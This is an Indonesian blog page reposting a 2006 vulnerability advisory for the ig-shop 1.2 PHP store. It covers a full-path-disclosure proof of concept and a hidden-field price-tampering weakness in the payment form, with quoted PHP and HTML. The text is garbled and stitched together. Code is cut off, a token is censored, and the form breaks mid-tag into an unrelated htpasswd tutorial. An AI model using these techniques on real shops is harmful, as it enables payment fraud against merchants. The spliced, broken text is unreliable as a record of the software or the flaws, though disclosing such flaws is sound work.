LaGiPusHinGWitH ---- IT
Navigation
Home |
Categories
Monthly Archives
- September 2010
- October 2009
- December 2008
- November 2008
- October 2008
- September 2008
- July 2008
- May 2008
- March 2008
- December 2007
- October 2007
- September 2007
- August 2007
Most recent entries
- Create Oracle Tablespace on SAP with BRTools
- Audit on Oracle Database
- Membuat Oracle Data Guard
- Cerita Tentang Kamu
- Membuat ulang/re-create controlfile di oracle
- Membuat RMAN dengan crontab
- Saat kau hadir kembali
- Memindahkan controlfile dan redologfile pada Oracle
- Oracle Dataguard on Standart Edition
- Adakah aku dihatimu
- Instalasi 10g di HP-UX Itanium
- Instalasi OpenOffice di Slackware 12
- Syncronize archive log
- Merubah ukuran archived Log
- Alter Block Size for tablespace
Syndicate
Site Credits
Powered by:
ExpressionEngine
Design by:
BlogMoxie
Author: roninmorgue
Date: April, 29th 2006
Location: Indonesia, Jakarta
Web: http://www.forum.mercubuana-it.org/
--------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
ig-shop is advance free e-commerce, written in php.
Download : http://prdownloads.sourceforge.net/ig-s ... p?download
Online support info@igeneric.co.uk
Website http://www.igeneric.co.uk
Version :
Tested in version 1.2
not tested in older or maybe newer version
-------------------------------------------------------------
Vulnerabilities:
~~~~~~~~~~~~~~~~
A. Full Path Disclosure :
poc :
http://jouninhackers/ig-shop/ig_shop/pa ... oduct_id=1
dengan menghilangkan nomor index produk.
http://jouninhackers/ig-shop/ig_shop/pa ... roduct_id=
Warning: Cannot add header information - headers already sent by (output started at
c:apachehtdocsig-shopig_shopclass.FastTemplate.php:349) in c:apachehtdocs
ig-shopig_shopproduct.php on line 211
akan terlihat pesan error pada halaman disertai dengan path lengkap dari path
server menuju path domain kita…
vulnerability terjadi pada fungsi module_product_view_show($module_id,$param)
product.php
function module_product_view_show($module_id,$param) {
global $tpl,$product_id,$view_image,$type_id,$session,$HTTP_COOKIE_VARS;
if (!$product_id) {
sleep(2);
header("Location: index.php");
}
dengan class FastTemplate pada file class.FastTemplate.php
pada fungsi module_product_view_show($module_id,$param) apabila index produk tidak ada
maka akan didirect pada halaman index.php tetapi pada class FastTemplate telah
ditampilkan terlebih dahulu halaman produk pilihan sehingga error handling mengalami
kegagalan fungsi.
B. Hidden field vulnerability
pada saat checkout sebenarnya sudah diterapkan proses validasi harga yang dilakukan oleh server
view_chart.php
if ($pids) {
$result = mysql_query("select p.*,mf.name as manuf_name,t.name as type_name from catalog_product
as p left join catalog_manuf as mf on p.manuf_id = mf.manuf_id left
join catalog_type as t on p.type_id = t.type_id
where p.product_id in ($pids) group by p.product_id order by mf.name,p.model");
if ($result && mysql_num_rows($result)) {
$tpl->parse("HTML”,"head");
$tpl->FastPrint("HTML");
$total = 0;
while ($l = mysql_fetch_array($result)) {
$tpl->$%@!&#$_SENCORED_$%@!&#$(array("PRODUCT_ID" => “$l[product_id]”,
“MODEL” => strip_tags($l[model]),
“CODE” => “$l”,
“TYPE” => strip_tags($l[type_name]),
“PRICE” => sprintf("%.2f",$l[price]),
“MANUF” => “$l[manuf_name]"));
===================potong============================
sehingga user tidak dapat melakukan perubahan data/nilai dengan cara merubah kode pada klien dengan
teknik mendownload halamaman dalam bentuk HTML
tetapi pada level payment gateway (cart.php) terdapat script:
if ($new_order)
$grandtotal = “$total+$shipping”;
$pmisi = “
Igeneric Order Confirmation
==================================
Order ID: $session[order_id]
SubTotal: $total
Shipping: $shipping
Total: $grandtotal
====================================
Billing Information
====================================
Salutation: $data[salutation]
First Name: $data[first
==========================potong=================
yang apabila didownload oleh klien dalam bentuk HTML akan menghasilkan script :
<form name="cart" action="https://www.secpay.com/java-bin/ValCard" method="post">
<input type="hidden" name="merchant" value="mikenu01">
<input type="hidden" name="trans_id" value="13">
<input type="hidden" name="callback" value="#">
==========================potong=================
<input type="hidden" name="amount" value="5100005.00">
<input type="hidden" name="order"
value="<order class=’com.secpay.seccard.Order’<
<orderLines class=’com.secpay.seccard.OrderLine’<
<OrderLine<
require user roninmorgue
</Limit>
Dalam contoh di atas, untuk mengakses direktori tersebut dibutuhkan userid
“roninmorgue” dan password yang sama dengan entry userid roninmorgue di berkas
“/home/roninmorgue/.kuncirahasia”. Ketika direktori tersebut diakses, akan muncul
sebuah pop-up window yang menanyakan userid dan password.
Password di dalam berkas “/home/roninmorgue/.kuncirahasia” dapat dibuat dengan
menggunakan program “htpasswd”.
unix% htpasswd -c /home/roninmorgue/.kuncirahasia roninmorgue
New password: ***********
----------------------------------------------------------
Shoutz:
~~~~~~~
~ forum|staff (roninmorgue, darkstar, admin, qnoyyy, gaga, kalion, WaferStick, newbie)
~ mercubuana-it@yahoogroups.com ,
----------------------------------------------------------
Contact:
~~~~~~~~
roninmorgue || forum|staff
Homepage: http://www.forum.mercubuana-it.org/
email: roninmorgue[at]yahoo[dot]co[dot]id
Computer Hacking • (0) Comments • (186) Trackbacks • Permalink